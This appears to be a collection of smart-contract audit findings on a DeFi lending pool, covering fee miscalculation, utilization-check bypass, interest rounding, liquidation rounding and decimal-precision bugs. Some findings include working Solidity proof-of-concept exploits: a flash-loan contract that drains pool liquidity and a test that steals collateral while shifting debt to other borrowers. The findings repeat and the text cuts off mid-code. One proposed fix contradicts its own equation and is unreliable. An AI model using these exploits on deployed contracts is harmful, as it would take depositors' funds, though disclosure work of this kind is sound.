Fees are given to the feeRecipient by minting them shares. The current share calculation is incorrect and always mints too many shares the fee recipient, giving them more fees than they should get.\\nThe current equation is incorrect and will give too many shares, which is demonstrated in the example below.\\nExample:\\n```\\n_supplied = 100\\n_totalSupply = 100\\n\\n_interest = 10\\nfee = 2\\n```\\n\\nCalculate the fee with the current equation:\\n```\\n_accuredFeeShares = fee * _totalSupply / supplied = 2 * 100 / 100 = 2\\n```\\n\\nThis yields 2 shares. Next calculate the value of the new shares:\\n```\\n2 * 110 / 102 = 2.156\\n```\\n\\nThe value of these shares yields a larger than expected fee. Using a revised equation gives the correct amount of fees:\\n```\\n_accuredFeeShares = (_totalSupply * fee) / (_supplied + _interest - fee) = 2 * 100 / (100 + 10 - 2) = 1.852\\n\\n1.852 * 110 / 101.852 = 2\\n```\\n\\nThis new equation yields the proper fee of 2.
Issue Fee share calculation is incorrect\\nUse the modified equation shown above:\\n```\\n uint fee = _interest * _feeMantissa / 1e18;\\n // 13. Calculate the accrued fee shares\\n- _accruedFeeShares = fee * _totalSupply / _supplied; // if supplied is 0, we will have returned at step 7\\n+ _accruedFeeShares = fee * (_totalSupply * fee) / (_supplied + _interest - fee); // if supplied is 0, we will have returned at step 7\\n // 14. Update the total supply\\n _currentTotalSupply += _accruedFeeShares;\\n```\\n
Fee recipient is given more fees than intended, which results in less interest for LPs
```\\n_supplied = 100\\n_totalSupply = 100\\n\\n_interest = 10\\nfee = 2\\n```\\n
Users can borrow all loan tokens
medium
Utilization rate check can be bypassed depositing additional loan tokens and withdrawing them in the same transaction.\\nIn the `borrow` function it is checked that the new utilization ratio will not be higher than the surge threshold. This threshold prevents borrowers from draining all available liquidity from the pool and also trigger the surge state, which lowers the collateral ratio.\\nA user can bypass this and borrow all available loan tokens following these steps:\\nDepositing the required amount of loan tokens in order to increase the balance of the pool.\\nBorrow the remaining loan tokens from the pool.\\nWithdraw the loan tokens deposited in the first step.\\nThis can be done in one transaction and the result will be a utilization rate of 100%. Even if the liquidity of the pool is high, the required loan tokens to perform the strategy can be borrowed using a flash loan.\\nHelper contract:\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity 0.8.17;\\n\\nimport { FlashBorrower, Flashloan, IERC20Token } from "./FlashLoan.sol";\\nimport { Pool } from "./../../src/Pool.sol";\\n\\ncontract Borrower is FlashBorrower {\\n address public immutable owner;\\n Flashloan public immutable flashLoan;\\n Pool public immutable pool;\\n IERC20Token public loanToken;\\n\\n constructor(Flashloan _flashLoan, Pool _pool) {\\n owner = msg.sender;\\n flashLoan = _flashLoan;\\n pool = _pool;\\n loanToken = IERC20Token(address(_pool.LOAN_TOKEN()));\\n }\\n\\n function borrowAll() public returns (bool) {\\n // Get current values from pool\\n pool.withdraw(0);\\n uint loanTokenBalance = loanToken.balanceOf(address(pool));\\n loanToken.approve(address(pool), loanTokenBalance);\\n\\n // Execute flash loan\\n flashLoan.execute(FlashBorrower(address(this)), loanToken, loanTokenBalance, abi.encode(loanTokenBalance));\\n }\\n\\n function onFlashLoan(IERC20Token token, uint amount, bytes calldata data) public override {\\n // Decode data\\n (uint loanTokenBalance) = abi.decode(data, (uint));\\n\\n // Deposit tokens borrowed from flash loan, borrow all other LOAN tokens from pool and\\n // withdraw the deposited tokens\\n pool.deposit(amount);\\n pool.borrow(loanTokenBalance);\\n pool.withdraw(amount);\\n\\n // Repay the loan\\n token.transfer(address(flashLoan), amount);\\n\\n // Send loan tokens to owner\\n loanToken.transfer(owner, loanTokenBalance);\\n }\\n}\\n```\\n\\nExecution:\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity 0.8.17;\\n\\nimport "forge-std/Test.sol";\\nimport "../src/Pool.sol";\\nimport "../src/Factory.sol";\\nimport "./mocks/Borrower.sol";\\nimport "./mocks/ERC20.sol";\\n\\ncontract PoC is Test {\\n address alice = vm.addr(0x1);\\n address bob = vm.addr(0x2);\\n Factory factory;\\n Pool pool;\\n Borrower borrower;\\n Flashloan flashLoan;\\n MockERC20 collateralToken;\\n MockERC20 loanToken;\\n uint maxCollateralRatioMantissa;\\n uint surgeMantissa;\\n uint collateralRatioFallDuration;\\n uint collateralRatioRecoveryDuration;\\n uint minRateMantissa;\\n uint surgeRateMantissa;\\n uint maxRateMantissa;\\n\\n function setUp() public {\\n factory = new Factory(address(this), "G");\\n flashLoan = new Flashloan();\\n collateralToken = new MockERC20(1 ether, 18);\\n collateralToken.transfer(bob, 1 ether);\\n loanToken = new MockERC20(100 ether, 18);\\n loanToken.transfer(alice, 1 ether);\\n loanToken.transfer(address(flashLoan), 99 ether);\\n maxCollateralRatioMantissa = 1e18;\\n surgeMantissa = 0.8e18; // 80%\\n pool = factory.deploySurgePool(IERC20(address(collateralToken)), IERC20(address(loanToken)), maxCollateralRatioMantissa, surgeMantissa, 1e15, 1e15, 0.1e18, 0.4e18, 0.6e18);\\n }\\n\\n function testFailBorrowAll() external {\\n // Alice deposits 1 LOAN token\\n vm.startPrank(alice);\\n loanToken.approve(address(pool), 1 ether);\\n pool.deposit(1 ether);\\n vm.stopPrank();\\n\\n // Bob tries to borrow all available loan tokens\\n vm.startPrank(bob);\\n collateralToken.approve(address(pool), 1 ether);\\n pool.addCollateral(bob, 1 ether);\\n pool.borrow(1 ether);\\n vm.stopPrank();\\n }\\n\\n function testBypassUtilizationRate() external {\\n uint balanceBefore = loanToken.balanceOf(bob);\\n\\n // Alice deposits 1 LOAN token\\n vm.startPrank(alice);\\n loanToken.approve(address(pool), 1 ether);\\n pool.deposit(1 ether);\\n vm.stopPrank();\\n\\n // Bob tries to borrow all available loan tokens\\n vm.startPrank(bob);\\n collateralToken.approve(address(pool), 1 ether);\\n borrower = new Borrower(flashLoan, pool);\\n pool.addCollateral(address(borrower), 1 ether);\\n borrower.borrowAll();\\n vm.stopPrank();\\n\\n assertEq(loanToken.balanceOf(bob) - balanceBefore, 1 ether);\\n }\\n}\\n```\\n
A possible solution would be adding a locking period for deposits of loan tokens.\\nAnother possibility is to enforce that the utilization rate was under the surge rate also in the previous snapshot.
The vulnerability allows to drain all the liquidity from the pool, which entails two problems:\\nThe collateral ratio starts decreasing and only stops if the utilization ratio goes back to the surge threshold.\\nThe suppliers will not be able to withdraw their tokens.\\nThe vulnerability can be executed by the same or other actors every time a loan is repaid or a new deposit is done, tracking the mempool and borrowing any new amount of loan tokens available in the pool, until the collateral ratio reaches a value of zero.\\nA clear case with economic incentives to perform this attack would be that the collateral token drops its price at a high rate and borrow all the available loan tokens from the pool, leaving all suppliers without the chance of withdrawing their share.
```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity 0.8.17;\\n\\nimport { FlashBorrower, Flashloan, IERC20Token } from "./FlashLoan.sol";\\nimport { Pool } from "./../../src/Pool.sol";\\n\\ncontract Borrower is FlashBorrower {\\n address public immutable owner;\\n Flashloan public immutable flashLoan;\\n Pool public immutable pool;\\n IERC20Token public loanToken;\\n\\n constructor(Flashloan _flashLoan, Pool _pool) {\\n owner = msg.sender;\\n flashLoan = _flashLoan;\\n pool = _pool;\\n loanToken = IERC20Token(address(_pool.LOAN_TOKEN()));\\n }\\n\\n function borrowAll() public returns (bool) {\\n // Get current values from pool\\n pool.withdraw(0);\\n uint loanTokenBalance = loanToken.balanceOf(address(pool));\\n loanToken.approve(address(pool), loanTokenBalance);\\n\\n // Execute flash loan\\n flashLoan.execute(FlashBorrower(address(this)), loanToken, loanTokenBalance, abi.encode(loanTokenBalance));\\n }\\n\\n function onFlashLoan(IERC20Token token, uint amount, bytes calldata data) public override {\\n // Decode data\\n (uint loanTokenBalance) = abi.decode(data, (uint));\\n\\n // Deposit tokens borrowed from flash loan, borrow all other LOAN tokens from pool and\\n // withdraw the deposited tokens\\n pool.deposit(amount);\\n pool.borrow(loanTokenBalance);\\n pool.withdraw(amount);\\n\\n // Repay the loan\\n token.transfer(address(flashLoan), amount);\\n\\n // Send loan tokens to owner\\n loanToken.transfer(owner, loanTokenBalance);\\n }\\n}\\n```\\n
fund loss because calculated Interest would be 0 in getCurrentState() due to division error
medium
function `getCurrentState()` Gets the current state of pool variables based on the current time and other functions use it to update the contract state. it calculates interest accrued for debt from the last timestamp but because of the division error in some cases the calculated interest would be 0 and it would cause borrowers to pay no interest.\\nThis is part of `getCurrentState()` code that calculates interest:\\n```\\n // 2. Get the time passed since the last interest accrual\\n uint _timeDelta = block.timestamp - _lastAccrueInterestTime;\\n \\n // 3. If the time passed is 0, return the current values\\n if(_timeDelta == 0) return (_currentTotalSupply, _accruedFeeShares, _currentCollateralRatioMantissa, _currentTotalDebt);\\n \\n // 4. Calculate the supplied value\\n uint _supplied = _totalDebt + _loanTokenBalance;\\n // 5. Calculate the utilization\\n uint _util = getUtilizationMantissa(_totalDebt, _supplied);\\n\\n // 6. Calculate the collateral ratio\\n _currentCollateralRatioMantissa = getCollateralRatioMantissa(\\n _util,\\n _lastAccrueInterestTime,\\n block.timestamp,\\n _lastCollateralRatioMantissa,\\n COLLATERAL_RATIO_FALL_DURATION,\\n COLLATERAL_RATIO_RECOVERY_DURATION,\\n MAX_COLLATERAL_RATIO_MANTISSA,\\n SURGE_MANTISSA\\n );\\n\\n // 7. If there is no debt, return the current values\\n if(_totalDebt == 0) return (_currentTotalSupply, _accruedFeeShares, _currentCollateralRatioMantissa, _currentTotalDebt);\\n\\n // 8. Calculate the borrow rate\\n uint _borrowRate = getBorrowRateMantissa(_util, SURGE_MANTISSA, MIN_RATE, SURGE_RATE, MAX_RATE);\\n // 9. Calculate the interest\\n uint _interest = _totalDebt * _borrowRate * _timeDelta / (365 days * 1e18); // does the optimizer optimize this? or should it be a constant?\\n // 10. Update the total debt\\n _currentTotalDebt += _interest;\\n```\\n\\ncode should support all the ERC20 tokens and those tokens may have different decimals. also different pools may have different values for MIN_RATE, SURGE_RATE, MAX_RATE. imagine this scenario:\\ndebt token is USDC and has 6 digit decimals.\\nMIN_RATE is 5% (2 * 1e16) and MAX_RATE is 10% (1e17) and in current state borrow rate is 5% (5 * 1e16)\\ntimeDelta is 2 second. (two seconds passed from last accrue interest time)\\ntotalDebt is 100M USDC (100 * 1e16).\\neach year has about 31M seconds (31 * 1e6).\\nnow code would calculate interest as: `_totalDebt * _borrowRate * _timeDelta / (365 days * 1e18) = 100 * 1e6 * 5 * 1e16 * 2 / (31 * 1e16 * 1e18) = 5 * 2 / 31 = 0`.\\nso code would calculate 0 interest in each interactions and borrowers would pay 0 interest. the debt decimal and interest rate may be different for pools and code should support all of them.
don't update contract state(lastAccrueInterestTime) when calculated interest is 0. add more decimal to total debt and save it with extra 1e18 decimals and transferring or receiving debt token convert the token amount to more decimal format or from it.
borrowers won't pay any interest and lenders would lose funds.
```\\n // 2. Get the time passed since the last interest accrual\\n uint _timeDelta = block.timestamp - _lastAccrueInterestTime;\\n \\n // 3. If the time passed is 0, return the current values\\n if(_timeDelta == 0) return (_currentTotalSupply, _accruedFeeShares, _currentCollateralRatioMantissa, _currentTotalDebt);\\n \\n // 4. Calculate the supplied value\\n uint _supplied = _totalDebt + _loanTokenBalance;\\n // 5. Calculate the utilization\\n uint _util = getUtilizationMantissa(_totalDebt, _supplied);\\n\\n // 6. Calculate the collateral ratio\\n _currentCollateralRatioMantissa = getCollateralRatioMantissa(\\n _util,\\n _lastAccrueInterestTime,\\n block.timestamp,\\n _lastCollateralRatioMantissa,\\n COLLATERAL_RATIO_FALL_DURATION,\\n COLLATERAL_RATIO_RECOVERY_DURATION,\\n MAX_COLLATERAL_RATIO_MANTISSA,\\n SURGE_MANTISSA\\n );\\n\\n // 7. If there is no debt, return the current values\\n if(_totalDebt == 0) return (_currentTotalSupply, _accruedFeeShares, _currentCollateralRatioMantissa, _currentTotalDebt);\\n\\n // 8. Calculate the borrow rate\\n uint _borrowRate = getBorrowRateMantissa(_util, SURGE_MANTISSA, MIN_RATE, SURGE_RATE, MAX_RATE);\\n // 9. Calculate the interest\\n uint _interest = _totalDebt * _borrowRate * _timeDelta / (365 days * 1e18); // does the optimizer optimize this? or should it be a constant?\\n // 10. Update the total debt\\n _currentTotalDebt += _interest;\\n```\\n
A liquidator can gain not only collateral, but also can reduce his own debt!
medium
A liquidator can gain not only collateral, but also can reduce his own debt. This is achieved by taking advantage of the following vulnerability of the liquidate(): it has a rounding down precision error and when one calls liquidate(Bob, 1), it is possible that the total debt is reduced by 1, but the debt share is 0, and thus Bob's debt shares will not be reduced. In this way, the liquidator can shift part of debt to the remaining borrowers while getting the collateral of the liquidation.\\nIn summary, the liquidator will be able to liquidate a debtor, grab proportionately the collateral, and in addition, reduce his own debt by shifting some of his debt to the other borrowers.\\nBelow, I explain the vulnerability and then show the code POC to demonstate how a liquidator can gain collateral as well as reduce his own debt!\\nThe `liquidate()` function calls `tokenToShares()` at L587 to calculate the number of debt shares for the input `amount`. Note it uses a rounding-down.\\nDue to rounding down, it is possible that while `amount !=0`, the returned number of debt shares could be zero!\\nIn the following code POC, we show that Bob (the test account) and Alice (address(1)) both borrow 1000 loan tokens, and after one year, each of them owe 1200 loan tokens. Bob liquidates Alice's debt with 200 loan tokens. Bob gets the 200 collateral tokens (proportionately). In addition, Bob reduces his own debt from 1200 to 1100!\\nTo run this test, one needs to change `pool.getDebtOf()` as a public function.\\n```\\nfunction testLiquidateSteal() external {\\n uint loanTokenAmount = 12000;\\n uint borrowAmount = 1000;\\n uint collateralAmountA = 10000;\\n uint collateralAmountB = 1400;\\n MockERC20 collateralToken = new MockERC20(collateralAmountA+collateralAmountB, 18);\\n MockERC20 loanToken = new MockERC20(loanTokenAmount, 18);\\n Pool pool = factory.deploySurgePool(IERC20(address(collateralToken)), IERC20(address(loanToken)), 0.8e18, 0.5e18, 1e15, 1e15, 0.1e18, 0.4e18, 0.6e18);\\n loanToken.approve(address(pool), loanTokenAmount);\\n pool.deposit(loanTokenAmount);\\n\\n // Alice borrows 1000 \\n collateralToken.transfer(address(1), collateralAmountB);\\n vm.prank(address(1));\\n collateralToken.approve(address(pool), collateralAmountB);\\n vm.prank(address(1));\\n pool.addCollateral(address(1), collateralAmountB);\\n vm.prank(address(1));\\n pool.borrow(borrowAmount);\\n\\n // Bob borrows 1000 too \\n collateralToken.approve(address(pool), collateralAmountA);\\n pool.addCollateral(address(this), collateralAmountA);\\n pool.borrow(borrowAmount);\\n\\n // Bob's debt becomes 1200\\n vm.warp(block.timestamp + 365 days);\\n pool.withdraw(0);\\n uint mydebt = pool.getDebtOf(pool.debtSharesBalanceOf(address(this)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(mydebt, 1200); \\n\\n // Alice's debt becomes 1200\\n uint address1Debt = pool.getDebtOf(pool.debtSharesBalanceOf(address(1)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(address1Debt, 1200); \\n assertEq(pool.lastTotalDebt(), 2399); \\n\\n uint myCollateralBeforeLiquidate = collateralToken.balanceOf(address(this));\\n\\n // liquidate 200 for Alice\\n loanToken.approve(address(pool), 200);\\n for(int i; i<200; i++)\\n pool.liquidate(address(1), 1);\\n\\n // Alice's debt shares are NOT reduced, now Bob's debt is reduced to 1100\\n uint debtShares = pool.debtSharesBalanceOf(address(1));\\n assertEq(debtShares, 1000);\\n assertEq(pool.lastTotalDebt(), 2199);\\n address1Debt = pool.getDebtOf(pool.debtSharesBalanceOf(address(1)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(address1Debt, 1100); \\n mydebt = pool.getDebtOf(pool.debtSharesBalanceOf(address(this)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(mydebt, 1100); \\n\\n // Bob gains the collateral as well proportionately \\n uint myCollateralAfterLiquidate = collateralToken.balanceOf(address(this));\\n assertEq(myCollateralAfterLiquidate-myCollateralBeforeLiquidate, 200);\\n }\\n```\\n
We need to double check this edge case and now allowing the liquidate() to proceed when the # of debt shares is Zero.\\n```\\n function liquidate(address borrower, uint amount) external {\\n uint _loanTokenBalance = LOAN_TOKEN.balanceOf(address(this));\\n (address _feeRecipient, uint _feeMantissa) = FACTORY.getFee();\\n ( \\n uint _currentTotalSupply,\\n uint _accruedFeeShares,\\n uint _currentCollateralRatioMantissa,\\n uint _currentTotalDebt\\n ) = getCurrentState(\\n _loanTokenBalance,\\n _feeMantissa,\\n lastCollateralRatioMantissa,\\n totalSupply,\\n lastAccrueInterestTime,\\n lastTotalDebt\\n );\\n\\n uint collateralBalance = collateralBalanceOf[borrower];\\n uint _debtSharesSupply = debtSharesSupply;\\n uint userDebt = getDebtOf(debtSharesBalanceOf[borrower], _debtSharesSupply, _currentTotalDebt);\\n uint userCollateralRatioMantissa = userDebt * 1e18 / collateralBalance;\\n require(userCollateralRatioMantissa > _currentCollateralRatioMantissa, "Pool: borrower not liquidatable");\\n\\n address _borrower = borrower; // avoid stack too deep\\n uint _amount = amount; // avoid stack too deep\\n uint _shares;\\n uint collateralReward;\\n if(_amount == type(uint).max || _amount == userDebt) {\\n collateralReward = collateralBalance;\\n _shares = debtSharesBalanceOf[_borrower];\\n _amount = userDebt;\\n } else {\\n uint userInvertedCollateralRatioMantissa = collateralBalance * 1e18 / userDebt;\\n collateralReward = _amount * userInvertedCollateralRatioMantissa / 1e18; // rounds down\\n _shares = tokenToShares(_amount, _currentTotalDebt, _debtSharesSupply, false);\\n }\\n \\n// Add the line below\\n if(_shares == 0) revert ZeroShareLiquidateNotAllowed();\\n\\n _currentTotalDebt -= _amount;\\n\\n // commit current state\\n debtSharesBalanceOf[_borrower] -= _shares;\\n debtSharesSupply = _debtSharesSupply - _shares;\\n collateralBalanceOf[_borrower] = collateralBalance - collateralReward;\\n totalSupply = _currentTotalSupply;\\n lastTotalDebt = _currentTotalDebt;\\n lastAccrueInterestTime = block.timestamp;\\n lastCollateralRatioMantissa = _currentCollateralRatioMantissa;\\n emit Liquidate(_borrower, _amount, collateralReward);\\n if(_accruedFeeShares > 0) {\\n address __feeRecipient = _feeRecipient; // avoid stack too deep\\n balanceOf[__feeRecipient] // Add the line below\\n= _accruedFeeShares;\\n emit Transfer(address(0), __feeRecipient, _accruedFeeShares);\\n }\\n\\n // interactions\\n safeTransferFrom(LOAN_TOKEN, msg.sender, address(this), _amount);\\n safeTransfer(COLLATERAL_TOKEN, msg.sender, collateralReward);\\n }\\n```\\n
A liquidator can gain not only collateral, but also can reduce his own debt. Thus, he effectively steals funding from the pool by off-shifting his debt to the remaining borrowers.
```\\nfunction testLiquidateSteal() external {\\n uint loanTokenAmount = 12000;\\n uint borrowAmount = 1000;\\n uint collateralAmountA = 10000;\\n uint collateralAmountB = 1400;\\n MockERC20 collateralToken = new MockERC20(collateralAmountA+collateralAmountB, 18);\\n MockERC20 loanToken = new MockERC20(loanTokenAmount, 18);\\n Pool pool = factory.deploySurgePool(IERC20(address(collateralToken)), IERC20(address(loanToken)), 0.8e18, 0.5e18, 1e15, 1e15, 0.1e18, 0.4e18, 0.6e18);\\n loanToken.approve(address(pool), loanTokenAmount);\\n pool.deposit(loanTokenAmount);\\n\\n // Alice borrows 1000 \\n collateralToken.transfer(address(1), collateralAmountB);\\n vm.prank(address(1));\\n collateralToken.approve(address(pool), collateralAmountB);\\n vm.prank(address(1));\\n pool.addCollateral(address(1), collateralAmountB);\\n vm.prank(address(1));\\n pool.borrow(borrowAmount);\\n\\n // Bob borrows 1000 too \\n collateralToken.approve(address(pool), collateralAmountA);\\n pool.addCollateral(address(this), collateralAmountA);\\n pool.borrow(borrowAmount);\\n\\n // Bob's debt becomes 1200\\n vm.warp(block.timestamp + 365 days);\\n pool.withdraw(0);\\n uint mydebt = pool.getDebtOf(pool.debtSharesBalanceOf(address(this)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(mydebt, 1200); \\n\\n // Alice's debt becomes 1200\\n uint address1Debt = pool.getDebtOf(pool.debtSharesBalanceOf(address(1)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(address1Debt, 1200); \\n assertEq(pool.lastTotalDebt(), 2399); \\n\\n uint myCollateralBeforeLiquidate = collateralToken.balanceOf(address(this));\\n\\n // liquidate 200 for Alice\\n loanToken.approve(address(pool), 200);\\n for(int i; i<200; i++)\\n pool.liquidate(address(1), 1);\\n\\n // Alice's debt shares are NOT reduced, now Bob's debt is reduced to 1100\\n uint debtShares = pool.debtSharesBalanceOf(address(1));\\n assertEq(debtShares, 1000);\\n assertEq(pool.lastTotalDebt(), 2199);\\n address1Debt = pool.getDebtOf(pool.debtSharesBalanceOf(address(1)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(address1Debt, 1100); \\n mydebt = pool.getDebtOf(pool.debtSharesBalanceOf(address(this)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(mydebt, 1100); \\n\\n // Bob gains the collateral as well proportionately \\n uint myCollateralAfterLiquidate = collateralToken.balanceOf(address(this));\\n assertEq(myCollateralAfterLiquidate-myCollateralBeforeLiquidate, 200);\\n }\\n```\\n
Precision differences when calculating userCollateralRatioMantissa causes major issues for some token pairs
high
When calculating userCollateralRatioMantissa in borrow and liquidate. It divides the raw debt value (in loan token precision) by the raw collateral balance (in collateral precision). This skew is fine for a majority of tokens but will cause issues with specific token pairs, including being unable to liquidate a subset of positions no matter what.\\nWhen calculating userCollateralRatioMantissa, both debt value and collateral values are left in the native precision. As a result of this certain token pairs will be completely broken because of this. Other pairs will only be partially broken and can enter state in which it's impossible to liquidate positions.\\nImagine a token pair like USDC and SHIB. USDC has a token precision of 6 and SHIB has 18. If the user has a collateral balance of 100,001 SHIB (100,001e18) and a loan borrow of 1 USDC (1e6) then their userCollateralRatioMantissa will actually calculate as zero:\\n```\\n1e6 * 1e18 / 100,001e18 = 0\\n```\\n\\nThere are two issues with this. First is that a majority of these tokens simply won't work. The other issue is that because userCollateralRatioMantissa returns 0 there are states in which some debt is impossible to liquidate breaking a key invariant of the protocol.\\nAny token with very high or very low precision will suffer from this.
userCollateralRatioMantissa should be calculated using debt and collateral values normalized to 18 decimal points
Some token pairs will always be/will become broken
```\\n1e6 * 1e18 / 100,001e18 = 0\\n```\\n
A liquidator can gain not only collateral, but also can reduce his own debt!
medium
A liquidator can gain not only collateral, but also can reduce his own debt. This is achieved by taking advantage of the following vulnerability of the liquidate(): it has a rounding down precision error and when one calls liquidate(Bob, 1), it is possible that the total debt is reduced by 1, but the debt share is 0, and thus Bob's debt shares will not be reduced. In this way, the liquidator can shift part of debt to the remaining borrowers while getting the collateral of the liquidation.\\nIn summary, the liquidator will be able to liquidate a debtor, grab proportionately the collateral, and in addition, reduce his own debt by shifting some of his debt to the other borrowers.\\nBelow, I explain the vulnerability and then show the code POC to demonstate how a liquidator can gain collateral as well as reduce his own debt!\\nThe `liquidate()` function calls `tokenToShares()` at L587 to calculate the number of debt shares for the input `amount`. Note it uses a rounding-down.\\nDue to rounding down, it is possible that while `amount !=0`, the returned number of debt shares could be zero!\\nIn the following code POC, we show that Bob (the test account) and Alice (address(1)) both borrow 1000 loan tokens, and after one year, each of them owe 1200 loan tokens. Bob liquidates Alice's debt with 200 loan tokens. Bob gets the 200 collateral tokens (proportionately). In addition, Bob reduces his own debt from 1200 to 1100!\\nTo run this test, one needs to change `pool.getDebtOf()` as a public function.\\n```\\nfunction testLiquidateSteal() external {\\n uint loanTokenAmount = 12000;\\n uint borrowAmount = 1000;\\n uint collateralAmountA = 10000;\\n uint collateralAmountB = 1400;\\n MockERC20 collateralToken = new MockERC20(collateralAmountA+collateralAmountB, 18);\\n MockERC20 loanToken = new MockERC20(loanTokenAmount, 18);\\n Pool pool = factory.deploySurgePool(IERC20(address(collateralToken)), IERC20(address(loanToken)), 0.8e18, 0.5e18, 1e15, 1e15, 0.1e18, 0.4e18, 0.6e18);\\n loanToken.approve(address(pool), loanTokenAmount);\\n pool.deposit(loanTokenAmount);\\n\\n // Alice borrows 1000 \\n collateralToken.transfer(address(1), collateralAmountB);\\n vm.prank(address(1));\\n collateralToken.approve(address(pool), collateralAmountB);\\n vm.prank(address(1));\\n pool.addCollateral(address(1), collateralAmountB);\\n vm.prank(address(1));\\n pool.borrow(borrowAmount);\\n\\n // Bob borrows 1000 too \\n collateralToken.approve(address(pool), collateralAmountA);\\n pool.addCollateral(address(this), collateralAmountA);\\n pool.borrow(borrowAmount);\\n\\n // Bob's debt becomes 1200\\n vm.warp(block.timestamp + 365 days);\\n pool.withdraw(0);\\n uint mydebt = pool.getDebtOf(pool.debtSharesBalanceOf(address(this)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(mydebt, 1200); \\n\\n // Alice's debt becomes 1200\\n uint address1Debt = pool.getDebtOf(pool.debtSharesBalanceOf(address(1)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(address1Debt, 1200); \\n assertEq(pool.lastTotalDebt(), 2399); \\n\\n uint myCollateralBeforeLiquidate = collateralToken.balanceOf(address(this));\\n\\n // liquidate 200 for Alice\\n loanToken.approve(address(pool), 200);\\n for(int i; i<200; i++)\\n pool.liquidate(address(1), 1);\\n\\n // Alice's debt shares are NOT reduced, now Bob's debt is reduced to 1100\\n uint debtShares = pool.debtSharesBalanceOf(address(1));\\n assertEq(debtShares, 1000);\\n assertEq(pool.lastTotalDebt(), 2199);\\n address1Debt = pool.getDebtOf(pool.debtSharesBalanceOf(address(1)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(address1Debt, 1100); \\n mydebt = pool.getDebtOf(pool.debtSharesBalanceOf(address(this)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(mydebt, 1100); \\n\\n // Bob gains the collateral as well proportionately \\n uint myCollateralAfterLiquidate = collateralToken.balanceOf(address(this));\\n assertEq(myCollateralAfterLiquidate-myCollateralBeforeLiquidate, 200);\\n }\\n```\\n
We need to double check this edge case and now allowing the liquidate() to proceed when the # of debt shares is Zero.\\n```\\n function liquidate(address borrower, uint amount) external {\\n uint _loanTokenBalance = LOAN_TOKEN.balanceOf(address(this));\\n (address _feeRecipient, uint _feeMantissa) = FACTORY.getFee();\\n ( \\n uint _currentTotalSupply,\\n uint _accruedFeeShares,\\n uint _currentCollateralRatioMantissa,\\n uint _currentTotalDebt\\n ) = getCurrentState(\\n _loanTokenBalance,\\n _feeMantissa,\\n lastCollateralRatioMantissa,\\n totalSupply,\\n lastAccrueInterestTime,\\n lastTotalDebt\\n );\\n\\n uint collateralBalance = collateralBalanceOf[borrower];\\n uint _debtSharesSupply = debtSharesSupply;\\n uint userDebt = getDebtOf(debtSharesBalanceOf[borrower], _debtSharesSupply, _currentTotalDebt);\\n uint userCollateralRatioMantissa = userDebt * 1e18 / collateralBalance;\\n require(userCollateralRatioMantissa > _currentCollateralRatioMantissa, "Pool: borrower not liquidatable");\\n\\n address _borrower = borrower; // avoid stack too deep\\n uint _amount = amount; // avoid stack too deep\\n uint _shares;\\n uint collateralReward;\\n if(_amount == type(uint).max || _amount == userDebt) {\\n collateralReward = collateralBalance;\\n _shares = debtSharesBalanceOf[_borrower];\\n _amount = userDebt;\\n } else {\\n uint userInvertedCollateralRatioMantissa = collateralBalance * 1e18 / userDebt;\\n collateralReward = _amount * userInvertedCollateralRatioMantissa / 1e18; // rounds down\\n _shares = tokenToShares(_amount, _currentTotalDebt, _debtSharesSupply, false);\\n }\\n \\n// Add the line below\\n if(_shares == 0) revert ZeroShareLiquidateNotAllowed();\\n\\n _currentTotalDebt -= _amount;\\n\\n // commit current state\\n debtSharesBalanceOf[_borrower] -= _shares;\\n debtSharesSupply = _debtSharesSupply - _shares;\\n collateralBalanceOf[_borrower] = collateralBalance - collateralReward;\\n totalSupply = _currentTotalSupply;\\n lastTotalDebt = _currentTotalDebt;\\n lastAccrueInterestTime = block.timestamp;\\n lastCollateralRatioMantissa = _currentCollateralRatioMantissa;\\n emit Liquidate(_borrower, _amount, collateralReward);\\n if(_accruedFeeShares > 0) {\\n address __feeRecipient = _feeRecipient; // avoid stack too deep\\n balanceOf[__feeRecipient] // Add the line below\\n= _accruedFeeShares;\\n emit Transfer(address(0), __feeRecipient, _accruedFeeShares);\\n }\\n\\n // interactions\\n safeTransferFrom(LOAN_TOKEN, msg.sender, address(this), _amount);\\n safeTransfer(COLLATERAL_TOKEN, msg.sender, collateralReward);\\n }\\n```\\n
A liquidator can gain not only collateral, but also can reduce his own debt. Thus, he effectively steals funding from the pool by off-shifting his debt to the remaining borrowers.
```\\nfunction testLiquidateSteal() external {\\n uint loanTokenAmount = 12000;\\n uint borrowAmount = 1000;\\n uint collateralAmountA = 10000;\\n uint collateralAmountB = 1400;\\n MockERC20 collateralToken = new MockERC20(collateralAmountA+collateralAmountB, 18);\\n MockERC20 loanToken = new MockERC20(loanTokenAmount, 18);\\n Pool pool = factory.deploySurgePool(IERC20(address(collateralToken)), IERC20(address(loanToken)), 0.8e18, 0.5e18, 1e15, 1e15, 0.1e18, 0.4e18, 0.6e18);\\n loanToken.approve(address(pool), loanTokenAmount);\\n pool.deposit(loanTokenAmount);\\n\\n // Alice borrows 1000 \\n collateralToken.transfer(address(1), collateralAmountB);\\n vm.prank(address(1));\\n collateralToken.approve(address(pool), collateralAmountB);\\n vm.prank(address(1));\\n pool.addCollateral(address(1), collateralAmountB);\\n vm.prank(address(1));\\n pool.borrow(borrowAmount);\\n\\n // Bob borrows 1000 too \\n collateralToken.approve(address(pool), collateralAmountA);\\n pool.addCollateral(address(this), collateralAmountA);\\n pool.borrow(borrowAmount);\\n\\n // Bob's debt becomes 1200\\n vm.warp(block.timestamp + 365 days);\\n pool.withdraw(0);\\n uint mydebt = pool.getDebtOf(pool.debtSharesBalanceOf(address(this)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(mydebt, 1200); \\n\\n // Alice's debt becomes 1200\\n uint address1Debt = 